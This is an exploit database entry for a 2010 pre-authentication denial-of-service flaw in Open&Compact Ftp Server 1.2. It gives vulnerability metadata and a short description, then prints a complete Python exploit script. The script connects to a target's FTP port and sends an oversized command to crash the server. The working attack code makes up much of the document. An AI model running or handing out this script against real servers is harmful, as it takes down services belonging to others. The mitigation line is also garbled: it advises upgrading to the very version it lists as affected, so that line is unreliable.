Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service

vendor:

Open&Compact Ftp Server

by:

Dr_IDE and Ma3sTr0-Dz

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Open&Compact Ftp Server

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:open_ftpd:open_ftpd:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2010

Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service

Open&Compact Ftp Server 1.2 is vulnerable to a Universal Pre-Auth Denial of Service attack. This attack is caused by sending a specially crafted command with a large amount of data to the server. This causes the server to crash and become unresponsive.

Mitigation:

Upgrade to the latest version of Open&Compact Ftp Server 1.2

Source

Exploit-DB raw data:

#!/usr/bin/python
###################################################################
#
# Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service
# Coded By: Dr_IDE
# Found By: Ma3sTr0-Dz
# Date:     May 24, 2010
# Download: http://sourceforge.net/projects/open-ftpd/
# Tested:   Windows 7
#
###################################################################

import random, socket, sys

host = (sys.argv[1])
buff = ("A: " * 3000)
cmds = ['ABOR', 'APPE', 'ALLO', 'PORT', 'USER', 'PASS', 'PASV', 'MKD', 'SIZE']

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[i] Connecting to: " + host +"\r\n")
s.connect((host, 21))
d=s.recv(1024)
print (d)
magic=random.choice(cmds)
print ("[*] Finding vulnerable commands.\r\n")
print ("[*] Performing some kind of complex calculations...\r\n")
print ("[*] Crashing server with command: " + magic + "\r\n")
s.send(magic + " " + buff + '\r\n')
print ("[i] Server Down")
s.close()
         
# End